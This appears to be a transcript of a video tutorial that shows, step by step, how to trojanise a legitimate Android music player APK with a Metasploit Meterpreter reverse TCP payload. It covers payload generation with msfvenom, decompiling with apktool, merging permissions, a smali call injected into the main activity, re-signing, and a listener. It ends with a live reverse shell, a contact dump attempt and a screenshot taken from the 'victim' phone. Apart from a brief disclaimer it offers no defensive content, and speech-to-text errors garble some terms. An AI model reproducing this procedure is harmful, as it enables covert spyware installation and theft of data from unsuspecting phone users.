What's up, guys? My name is Ahmad Khan. I'm an ethical hacker and a programmer. And today's lecture, we are going to discuss how we can backdoor Android. We will try to bind all malware with a legitimate application and R2 backdooring Android device, and we will see how we can gain fully unauthorized access on any Android phone device. Before diving to this lecture, I'm going to highly warn you that this lecture is totally for educational purpose. I'm not here to just spread cybercrime or any illegal activities. The purpose of this lecture is just to educate you and to aware about such type of attacks and how you can protect yourself from such type of techniques and attacks. So let's get started. Without wasting any time, let's move to the practical demonstration how it's possible. In this particular lecture, what I'm going to do, I'm going to use Spirit operating system. You can use any other type of operating system like Linux operating system, Ubuntu, depends on you, whatever you want. So I have to open a terminal in my Spirit operating system, and first of all I have to get root access in order to get administration privileges. As you can see from the symbol, it's $sign. It means that I don't have any administration privileges. For this purpose, I have to type sudo su and I have to put the password, and as you can see here, the sign is changed to hash. It means that I have successfully got the administration privileges, and I have to clear the screen. So first of all, I have to generate a payload for Android by using Metasploit framework. Metasploit framework offers MSF Venom in order to do this task. So let's write down the command. First of all, MSF Venom. That will help us to generate the malware for Android, and -p for payload, and we will specify the payload for Android, and then meterpreter, because we want meterpreter reverse TCP connection. Meterpreter, and then we want reverse _ TCP, and then you have to type lhost in order to specify the lhost, and then import in order to specify the port. So what I have to do, I have to open another terminal, and first of all I have to get the administration privileges, and I have to type ifconfig in order to find out my host IP address. You can see here the host IP address is a little bit changed. For this purpose I have to do something. I have to click on virtual machine, and then I have to click on network adapter, and then I will do bridge auto detect, and if I'll type ifconfig, okay, it's disconnected. Let's try to connect it again. I'm just waiting for it. If I'll clear the screen, if I'll type ifconfig, the system is still not, you can see we got the connection. So if I'll type ifconfig, if I'll hit enter, right now you can see here we got the IP address. So what I have to do, I have to specify the IP address is 172.20.10.4, 20.10.4, and I will specify the port. It will be in my case 444. You can use 8080 or whatever, depending on what do you want to use. So I have to type -o for output file. It will be in my case payload.apk. So if I hit enter, in a few seconds I will get the backdoor for Android, and as you can see here the payload is successfully generated. So what I have to do, I have to move this generated payload to html folder. For this I can type move for payload. I will specify the payload name, and then the destination directory as html. So what I have to do, I have to visit the directory html. So if I will type ls, and you can see here we got the payload. The next step is to generate the target APK, which will be the legitimate APK. In this particular example, I'm going to use music player. You can use apkmonks.com in order to get the APK. You can bind with any other type of application, whatever do you want. It's totally depend on you. You can type with WhatsApp. You can bind with WhatsApp. You can bind with Facebook. Depends on you. Depends on your type. You can depends on your choice. You can bind with any type of APK, legitimate APK. So I have successfully downloaded the file. The music player, and you can see here player.apk. That's the original file. I want to bind payload.apk with player.apk. So what I have to do, first of all, I have to decompile both the APK, I mean payload.apk and as well as the original APK, that is player.apk. So for you to do this, I mean to achieve this particular task, I can use APK tool. If you haven't installed APK tool, you can type APK apt-get install APK tool. But in my case, I have already installed it, so need to install it again. If I will type APK tool -v, and you will be able to get the version of APK tool. So I will clear the screen. What I have to do, I have to type again ls, and I have to create two folders. The first folder will be for payload, so I have to type I have typed mkdir to create a folder, and then payload. So this will be the folder for the decompile version of payload.apk. Same in the case I will do for the original one. So I will type mkdir, it will be original. So if I type ls, we got both the folders. So what I have to do right now, I have to type APK tool, and I have to decompile first of all payload.apk. So I will type d for decompile, I will type f, and then I will specify the file is payload.apk. And where I want the decompile form of payload.apk, I want and directory of payload. So I'm going to hit enter. So I'm waiting for this, and while we will get the decompile form. And as you can see, it's done. So I will type ls, if I will type cd payload, you can see here we got the decompile form of payload.apk. So I will clear the screen, I will go back, cd back, I will type ls, and you can see. So we have decompiled the payload.apk. Same as the case right now we will do for the player.apk. So what I'm going to do, I'm going to type apk tool, same as the case as I did for payload.apk. Same I will do for player.apk. So I will type -f, I will specify the file, and the output file will be original. I'm going to hit enter. So I'm waiting for this in order to get the decompiled form of player.apk. So, and you can see here, I'm waiting for this and I have to get, you can see it's done. So if I type ls, if I type cd original, if I type ls, you can see here we got it. So right now what I have to do, I have to visit payload folder. So I have to go back, I have to clear the screen, ls, I have to type payload, cd payload, and if I type ls, you can see here. So what I have to do, I have to visit smelly folder, and then ls, I have to type com folder, ls, and you can see here. So we have to copy this folder and we have to paste inside smelly com folder of the original folder. So for this, what I have to do, I have to type cp for copy and -r, and I will specify the folder, and the destination folder will be one directory back, two directory, third directory. So third directory, and then we have to visit original, smelly, and then com. So if I will hit enter, that's done. So if I will go back, cd dot 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 dot, if I type ls, if I type original, cd original, if I type cd, sorry, smelly, and com. So if I type ls, and as you can see, we got the metasploit folder that we have copied from payload folder. So if I type ls, and you can see here we got it. So what I have to do, I have to clear the screen. Right now we done it. So what's the next step? I mean, what's we have to do after this step? So right now I have to copy the information of payload folder, and then I will paste and the original folder. So I have to go back first of all, ls, still I will go back, I will clear the screen, I will type ls, and you can see. So I will visit payload, I will type ls, and you can see here we got android miniface.xml. So I have to open this file android miniface.xml, and I have to copy information from this particular file. So I can type nano android xml, and you can see here we got the permission. So what I have to do, I have to select all the permission I'm sorry. So let's try to select from here. I will click on copy and I will press Ctrl X. Sorry. Okay. So what I have to do, we have successfully copied the permission. I will go back. I will type right now. I will visit original folder and I will open nano android manifest.xml. So what I have to do, I have to paste all the permission here that we copied from payload folder. I mean payload XML file. So what I have to do, I have to paste the permission. You can see here we got the permission. So right now we have to remove duplicate permission from this particular file. So the first permission is ss_network state. So we have to look for this permission. So you can see here we got the duplicate for this particular permission. So we have to remove this because we have already the existence of this particular permission. So same as the case, the second permission is internet, android.permission internet. So what I have to do, android.permission .internet. So I have to look for this permission and you can see we got it. So I have to remove this as well, as we have the existence of this permission as well. So no need of this. So the second permission is Android set wallpaper. I think we have you can see. So I have to remove this as well. Same as the case, I have to remove it. The second permission is Android.permission .write external storage. So we have to search for this write external storage. You can see here we got it, write external storage. So we have to remove this permission as well. So what I'm going to do, I'm going to remove this permission. You done it. The next permission is read external storage. Read external storage. I think we don't have read external storage. We have to look for this write external storage, but we don't have read external storage. Second permission is the next permission is modify audio setting. So we have to look for this modify audio setting. I think we don't have the existence of this permission. The next permission is we don't have walk lock. I think we have for this wake lock. So what I have to do is, yeah, we got it. So I'm going to remove it. So the next permission is receive both, I think any existent information for the domain. So what I have to do, I have to remove the spaces. Now we done it. So I have to press Ctrl X and I have to put Y. Yes. So we done it. So now what's the next step? Now we have to find we have copied all the necessary information from the payload manifest.xml file and we paste into the original Android manifest.xml file. And now we have to find the main activity for the original file. So how we can find the main activity? Again, I will open the Android manifest.xml file, and what I have to do, I have to find out I think we don't have any command in order to find out and as you can see here, whereas I think if I do Ctrl W, yeah, we can do it. So what I have to type, you have to search for action.main. So I will hit enter and we got it. You can see action .main, and above this we can see the activity tag. So inside activity tag we got the folder, I mean we got the path for main activity file. So the path is com gspro.music mp3 player. So what I have to do, and the next terminal you can see here, I have to visit cd var dub html. So I have to visit original folder, I have to clear, I have to type ls. So the formation the path is com gs pro. So I have to visit, com is located in smelly folder, so I have to visit com, I have to visit gs pro, I have to visit music, I have to visit mp3 clear cd mp3, and if I type ls, you can see here I will visit UI, you can see then activity. So I will type cd activity. So if I type ls, and the next folder is cd splash, and if I'll type so I'll type ls, and as you can see here we got the main activity file. So now what I have to do, I have to open this file as well. So I will type nano flash activity.smelly. So I will hit enter, and as you can see, so if I will maximize this, you can see here. So now we have to find on create. So I will type control w, I will type on create, and as you can see here we got on create. So what I have to do, we got on create, but we have to look for invoke super method, so what I have to do, you can see here below this line we have to type some code. So I will explain the code, but first of all let me write it. So I will type invoke minus static, and then p0 the parameter, and then it will be welcome backslash metasploit backslash stage backslash payload, and then what I have to do, I have to type start landroid backslash content backslash context, and then v. So what does it mean? Let me explain the code that I wrote so far. What does it mean? So let's break it down. The first is invoke minus static. This instruction is used to invoke a static method from a class. Okay, the next thing is p0. This is the register representing the method parameter. In this case, p0 refer to the instance of the current class, the main activity class Now the second is ilcom backslash metasploit backslash stage backslash payload. This is the fully qualified class name of the class containing the static method we want to invoke. In this case, it refers to the class payload. Okay, within the com.metasploit.stage package. That's why we use it. The next thing is start. This is the name of the static method we want to invoke. In this case, it is the start method. Now, next code is landroid slash contain context, and then v. This is the method signature. It specifies the type of the parameter and the return type of the method. In this case, it indicates that the start method tag in android.content.context object is a parameter and has a wide return type v. Okay, by adding this line of code, this line of code that we wrote right now, that I wrote, not you people. By adding this line of code, we are invoking the start method of the payload class, passing the current instance of the main activity class is the parameter. This is the way, this is a way to incorporate the Metasploit payload fully functional into the main activity class of the APK, the original APK. So right now we done it. What I have to do, I have to save the file. So I will press Ctrl X again. Yes, I will hit enter. We done it. Right now we have to compile the file. So what I have to do, I have to go back. Again I will go back, and again to directory more, if I'll type ls. So right now we have to compile original folder. But before this, what I'm going to do, I'm going to create a folder for this. So I will type mkdir final. Final, if I'll type ls, that's done. So to compile original folder, we have to use again apk tool, and then we have to type b, and then I will type original, and the output file will be final, and the file name will be app.epk. So I will hit enter. Sorry for the spelling mistake, I'm so sorry to do this. What I have to do, and right now you can see here the process is under compilation. When we will do this, then we have to sign the APK. For this we have to generate keys in order to sign, in order to provide legitimate signature to our file, because some I think we are receiving some errors. I'm so sorry for the process. I tried lots in order to compile the decompile APK, but I faced problems. Now what I have to do, if I type ls, I have to zip original file, and then what I have to do, I have to move this into my Kali Linux operating system, since I have everything working and I am working with my Kali Linux operating system. So that's why I will recompile the file there. So what I have to do, first of all, I have to zip the file. First of all, let me remove the original.zip file. So if I type there ls, no, I don't have. So I have to zip the file. So I have to type zip-r, and I will specify this will be original.zip, and I want to zip original file. So you can see here. So it's done. If I'll type ls, now you can see we got the zip file. So I have to start service Apache 2 in order to transfer the file, the folder, into my Kali Linux operating system, so that I can recompile the folder there. So I will type service Apache 2 start. Now I have to move to my Kali Linux operating system. Now you can see here. So I will type the IP address of my parent operating system, and I will hit enter. You can see I will click here. You can see it asking for the download. I will click on OK. It's fine. So if I'll type ls, you can see here we got the file original .zip. You can see. So I have to unzip the file. For this I have to type unzip original.zip. So you can see here the file will be successfully unzipped, and you can see now I will visit the directory. You can see we got the original. So now I have to go back and I have to create a folder. It will be mkdir final. So sorry, mkdir. So I have to type apk tool. I have to type b in order to recompile original. I'm going to specify the output directory will be final, and the file will be app.apk. I'm going to hit enter. So once it's done, then I will create keys in order to sign the file. So I'm waiting for this, and as you can see here, the process is under recompilation. You can see it's done. So if I will type cd final directory, final folder, you can see we got the output apk file. So first of all, I have to create keys in order to sign the file, because the file is not signed and majority Android device will not install this file. So I have to type key tool in order to create keys. I will type key -gen key, and then -v for verbose, and then I will type minus key store, and I will specify the key, and it will be my key dot key store. So it's fine. So what I have to do, I have to type key alg, and I will specify the encryption will be key hyphen key alg stands for key algorithm, it will be RSA, and I will specify the key size, it will be like something like this, and I will specify the validity. So validity I will do like 10,000, yeah, and I will create the alias for this, it will be my key alias. So I'm going to hit enter. Key tool hyphen gem key store, where I did a mistake, the key size, oops, so we have to specify minus key. So it's asking for the password. I'm going to put the password, make sure you haven't forget the password, 123456 123456, and in your case it will be something else, it will be XYZ ABC ABF, it will be KAA, and the state name will be ERF, it will be 12345, like something like this. So I will put yes. So it will generate the key. So if I will type ls, and you can see here I got the keys. Now I will use this key in order to sign the apk app.apk file. So I will type jar signer in order to, I will use jar signer in order to sign the file. So I will type jar signer, and I will use verbose mode, and I will type sec lg, it will be sha1 with RSA. So I will specify the digital algorithm, so digest lg, it will be sha1 and hyphen key store, it will be my key store. So I will specify the file will be app.apk, and the alias will be my key minus alias. I will hit enter, and the password I will put the password 123456. I will hit enter, and it will sign the file. So I'm waiting for this. It's done. So right now I have to verify it, the signature. This step is optional, you can ignore this step, I mean you can skip this step. So jar sign verify hyphen verbose, and I will type cats, and the file name is app.apk, and as you can see here, this is the file. So it's done. So now what I have to do, the file is done, you can see here I have to move the file to our .html folder. So I will type move, the file name is app var.html. So if I visit the directory in order to make sure the file is there, yeah, we got it. So now what I have to do, while on the other hand, of course I have to get the reverse shell. So now what I have to do, I have to stop the MSF console. For this I have to type MSF console. MSF console will be started. And you can see I have to use exploit a module. This is the name of the module that offers by Metasploit. I will be use exploit slash multi slash handler. So I will set payload for Android, and it will be meterpreter slash reverse underscore TCP. I will set the L host, it will be 172, I mean the IP address of this operating system. I will set the L port as well. The L port was 444. Set L port 444. So if I will type show option in order to make sure all is well. Okay, so I have to type exploit Now you can see here it waiting for the reverse connection. So right now you can see I'm going to click on the application, and you can see here we got the music player. You can see I'm going to click on install, and you can see, so once the installation process will done, I will open the application. I will show you how it's look like. I'm still waiting for the installation process. And now as you can see here, the application is successfully installed. You can see here it's music player. So what I'm going to do, I'm going to click on open, and you can see here the sample music player is successfully opened. Nothing is suspicious. While on the other hand, we got a reverse shell, and as you can see here, we got the interpreter session. So if I will click on help, and we can execute all these commands. So if I will click on dump, if I will put dump contacts, this command will help me to dump all the contacts of the victim phone. So you can see here it's on waiting, but you can see the operation is failed. That's a problem with the Metasploit. You can see and I can execute any type of command. Again, if I put screenshot, and you can see we dumped the screenshot. So what I have to do, if I will visit the directory here, if I will click on paths, and if I will visit this particular directory, I mean var www.html, and as you can see this is the screenshot, but I'm unable to view it. You can see this is the screenshot that we took from the victim phone, I mean. So I hope you enjoyed this lecture, and if you have any problem or question related to this topic, you can contact me anytime in order to ask your particular problem. Thank you.